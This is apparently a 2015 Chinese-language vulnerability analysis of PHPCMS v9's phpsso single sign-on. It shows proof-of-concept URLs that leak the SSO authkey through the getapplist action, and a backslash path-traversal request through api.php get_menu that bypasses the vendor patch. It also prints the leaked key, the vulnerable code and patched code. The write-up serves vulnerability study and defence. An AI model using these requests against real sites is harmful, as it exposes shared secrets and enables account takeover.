catalog
1. 漏洞描述 2. 漏洞觸發條件 3. 漏洞影響範圍 4. 漏洞程式碼分析 5. 防禦方法 6. 攻防思考
1. 漏洞描述
安裝phpcms的時候會強制安裝它的通行證
Relevant Link:
http://www.wooyun.org/bugs/wooyun-2014-066394
2. 漏洞觸發條件
0x1: POC1
1. 訪問頭像上傳頁面 http://localhost/phpcms_v9/index.php?m=member&c=index&a=account_manage_avatar&t=1 //獲取'upurl':"aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ==&callback=return_avatar&" 2. Base64解碼後 http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA //將url裡的uploadavatar換成:getapplist http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA 3. 得到authkey
0x2: POC Bypass Path 1
http://localhost/phpcms_v9/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
3. 漏洞影響範圍
4. 漏洞程式碼分析
\phpsso_server\phpcms\modules\phpsso\index.php
/**
 * 獲取應用列表 — return every SSO client application record, serialized.
 *
 * NOTE(review): this is the unpatched version. The records come straight from
 * the `applist` admin cache and still carry `authkey`, the key the phpsso
 * constructor hands to sys_auth() to decode client `data`, so any caller that
 * reaches this action reads the SSO shared secret. Terminates the request.
 */
public function getapplist() {
    $records = getcache('applist', 'admin');
    $payload = serialize($records);
    exit($payload);
}
這個函式從cache中獲取applist資訊,繼續追溯cache裡的內容
\phpsso_server\caches\caches_admin\caches_data\applist.cache.php
<?php
// Cache file returned by getcache('applist', 'admin'): the SSO server's
// registered client applications. `authkey` is the per-client key that the
// phpsso constructor passes to sys_auth() to decode the `data` parameter, so
// any endpoint that can read arbitrary cache files exposes this secret.
return array(
    1 => array(
        'appid'       => '1',
        'type'        => 'phpcms_v9',
        'name'        => 'phpcms v9',
        'url'         => 'http://localhost/phpcms_v9/',
        'authkey'     => 'lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0',
        'ip'          => '',
        'apifilename' => 'api.php?op=phpsso',
        'charset'     => 'utf-8',
        'synlogin'    => '1',
    ),
);
所以只要我們呼叫phpsso並且能走到getapplist()這個方法裡,就會洩露sso配置的所有客戶端資訊,包括authkey,我們繼續回溯分析漏洞源頭
\phpsso_server\phpcms\modules\phpsso\classes\phpsso.class.php
public function __construct() { $this->db = pc_base::load_model('member_model'); pc_base::load_app_func('global'); /*獲取系統配置*/ $this->settings = getcache('settings', 'admin'); $this->applist = getcache('applist', 'admin'); //GET資料全部傳遞給POST if(isset($_GET) && is_array($_GET) && count($_GET) > 0) { foreach($_GET as $k=>$v) { if(!in_array($k, array('m','c','a'))) { $_POST[$k] = $v; } } } if(isset($_POST['appid'])) { $this->appid = intval($_POST['appid']); } else { exit('0'); } if(isset($_POST['data'])) { //將getapplist()結果賦值給$_POST['data'] parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data); if(empty($this->data) || !is_array($this->data)) { exit('0'); } } else { exit('0'); }
接下來的問題是我們要如何獲取$_POST['data'],繼續回溯到上傳頭像頁面
http://localhost/phpcms_v9/index.php?m=member&c=index&a=account_manage_avatar&t=1 //檢視原始碼 script type="text/javascript"> var flashvars = { 'upurl':"aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ==&callback=return_avatar&" }; var params = { 'align':'middle', 'play':'true', 'loop':'false', 'scale':'showall', 'wmode':'window', 'devicefont':'true', 'id':'Main', 'bgcolor':'#ffffff', 'name':'Main', 'allowscriptaccess':'always' }; var attributes = {
得到base64編碼後的URL
aHR0cDovL2xvY2FsaG9zdC9waHBjbXNfdjkvcGhwc3NvX3NlcnZlci9pbmRleC5waHA/bT1waHBzc28mYz1pbmRleCZhPXVwbG9hZGF2YXRhciZhdXRoX2RhdGE9dj0xJmFwcGlkPTEmZGF0YT1iOTVmNzJ2TUI1aHJGLVN0WXBhVWdSZkpDdVBxWjVOVGhLN3FSTE5jX3lOdEpTQmplZ3JLZVJIdXI1Rm94c0tKaDM3bGpsVDcyVjJ2dEdUZzREUW1aQQ== /* http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA */
將url裡的uploadavatar換成:getapplist
http://localhost/phpcms_v9/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=b95f72vMB5hrF-StYpaUgRfJCuPqZ5NThK7qRLNc_yNtJSBjegrKeRHur5FoxsKJh37ljlT72V2vtGTg4DQmZA
得到結果
a:1:{i:1;a:9:{s:5:"appid";s:1:"1";s:4:"type";s:9:"phpcms_v9";s:4:"name";s:9:"phpcms v9";s:3:"url";s:27:"http://localhost/phpcms_v9/";s:7:"authkey";s:32:"lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0";s:2:"ip";s:0:"";s:11:"apifilename";s:17:"api.php?op=phpsso";s:7:"charset";s:5:"utf-8";s:8:"synlogin";s:1:"1";}} /* authkey: lOmYTRe7Ze6iDOKmKfay42foD0TaWxv0 */
得到這個authkey,就可以獲得sso體系中的令牌,廠商對index.php中的getapplist()函式進行了patch,unset了陣列中的authkey鍵值,但是卻沒有充分考慮到全部的攻擊面:applist快取檔案本身仍然儲存著authkey,任何能夠讀取任意cache檔案的介面都能再次取得它
\api\get_menu.php
/**
 * 獲取地區列表 — JSONP endpoint listing the child nodes of one menu/area node.
 *
 * NOTE(review): unpatched version. `cachefile` and `path` only have '/' and
 * '//' removed ('//' is dead once '/' is gone), so a backslash survives and on
 * hosts where '\' is a path separator getcache() can be steered to a cache
 * file outside the directory this endpoint is meant to serve; `key` then
 * selects which field of every matching record is echoed back. $s and
 * $parentid are never initialised.
 */
function ajax_getlist() {
    $separators = array('/', '//');
    $cachefile = str_replace($separators, '', $_GET['cachefile']);
    $path      = str_replace($separators, '', $_GET['path']);
    $title     = $_GET['title']; // read but never used
    $key       = $_GET['key'];

    // Both arguments are caller-controlled (see note above).
    $infos    = getcache($cachefile, $path);
    $where_id = intval($_GET['parentid']);

    $parent_menu_name = '';
    if ($where_id != 0) {
        $parent_menu_name = trim($infos[$where_id][$key]);
    }

    foreach ($infos as $v) {
        if ($v['parentid'] != $where_id) {
            continue;
        }
        if ($v['parentid']) {
            // grandparent id; not reset between rows
            $parentid = $infos[$v['parentid']]['parentid'];
        }
        $fields = array($v['catid'], trim($v[$key]), $v['parentid'], $parent_menu_name, $parentid);
        $s[]    = iconv(CHARSET, 'utf-8', implode(',', $fields));
    }

    if (count($s) > 0) {
        echo trim_script($_GET['callback']), '(', json_encode($s), ')';
    } else {
        echo trim_script($_GET['callback']), '()';
    }
    exit;
}
Relevant Link:
http://0cx.cc/phpcms_phpsso_auth_key.jspx http://0day5.com/archives/3251
5. 防禦方法
\phpsso_server\phpcms\modules\phpsso\index.php
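/**
 * 獲取應用列表 — return the SSO client application list, serialized.
 *
 * The `authkey` of every application is removed before output: it is the key
 * the phpsso constructor passes to sys_auth() to decode client `data`, so
 * returning it to whoever can reach this action would hand out the SSO shared
 * secret. Terminates the request.
 */
public function getapplist() {
    $applist = getcache('applist', 'admin');
    // A missing or malformed cache yields a non-array; the vendor patch would
    // then hit foreach on a non-array. Treat it as an empty list instead.
    if (!is_array($applist)) {
        $applist = array();
    }
    foreach (array_keys($applist) as $appid) {
        if (is_array($applist[$appid])) {
            unset($applist[$appid]['authkey']);
        }
    }
    exit(serialize($applist));
}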
\api\get_menu.php
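/**
 * 獲取地區列表 — JSONP endpoint that lists the child nodes of one menu/area node.
 *
 * Loads the node table with getcache($cachefile, $path), where both names come
 * from the query string, then prints every node whose `parentid` equals the
 * `parentid` parameter as a JSON array wrapped in the `callback` function.
 *
 * Compared with the vendor patch (which only added '\' to the $cachefile
 * deny-list and left $path with the old '/' filter), the three cache-selecting
 * inputs are reduced to an allow-list of [A-Za-z0-9_-]: no '/', '\', '.' or
 * control character survives, so getcache() cannot be pointed at a file
 * outside the cache directory it normally serves. Whether every cache in that
 * directory is safe to expose through this endpoint is a separate question —
 * the allow-list does not decide that. $s and $parentid are initialised so an
 * empty result no longer calls count() on an undefined variable.
 */
function ajax_getlist() {
    // Allow-list instead of deny-list: stripping '/' and '//' missed '\'
    // (and '//' can never match once '/' has already been removed).
    $cachefile = isset($_GET['cachefile']) ? preg_replace('/[^A-Za-z0-9_\-]/', '', (string) $_GET['cachefile']) : '';
    $path      = isset($_GET['path'])      ? preg_replace('/[^A-Za-z0-9_\-]/', '', (string) $_GET['path']) : '';
    // `key` names the field echoed for each node; same allow-list so it can
    // only be an ordinary field name.
    $key       = isset($_GET['key'])       ? preg_replace('/[^A-Za-z0-9_\-]/', '', (string) $_GET['key']) : '';
    // `title` was read but never used by the original; it is dropped.

    $infos = getcache($cachefile, $path);
    if (!is_array($infos)) {
        // Missing or malformed cache file: behave as an empty node table.
        $infos = array();
    }

    $where_id = isset($_GET['parentid']) ? intval($_GET['parentid']) : 0;
    $parent_menu_name = '';
    if ($where_id != 0 && isset($infos[$where_id][$key])) {
        $parent_menu_name = trim($infos[$where_id][$key]);
    }

    $s = array();
    foreach ($infos as $v) {
        if (!is_array($v) || !isset($v['parentid']) || $v['parentid'] != $where_id) {
            continue;
        }
        // Grandparent id, reset for every row: the original let the value
        // from a previous iteration leak into rows that have no grandparent.
        $parentid = '';
        if ($v['parentid'] && isset($infos[$v['parentid']]['parentid'])) {
            $parentid = $infos[$v['parentid']]['parentid'];
        }
        $catid = isset($v['catid']) ? $v['catid'] : '';
        $label = isset($v[$key]) ? trim($v[$key]) : '';
        $s[] = iconv(CHARSET, 'utf-8', $catid . ',' . $label . ',' . $v['parentid'] . ',' . $parent_menu_name . ',' . $parentid);
    }

    $callback = trim_script(isset($_GET['callback']) ? $_GET['callback'] : '');
    if (count($s) > 0) {
        echo $callback, '(', json_encode($s), ')';
    } else {
        echo $callback, '()';
    }
    exit;
}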
Relevant Link:
http://0day5.com/archives/3202 http://www.wooyun.org/bugs/wooyun-2015-0105242
6. 攻防思考
Copyright (c) 2015 Little5ann All rights reserved